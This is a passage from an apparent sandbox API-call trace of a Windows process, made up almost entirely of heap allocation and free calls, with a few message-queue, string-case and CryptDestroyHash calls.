hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0265.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.888] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0265.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.888] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.889] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.889] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.890] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0265.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0265.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0265.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0265.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.893] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0265.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0265.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.893] CryptDestroyHash (hHash=0xaa5860) returned 1 [0265.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.896] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.898] HeapFree (in: 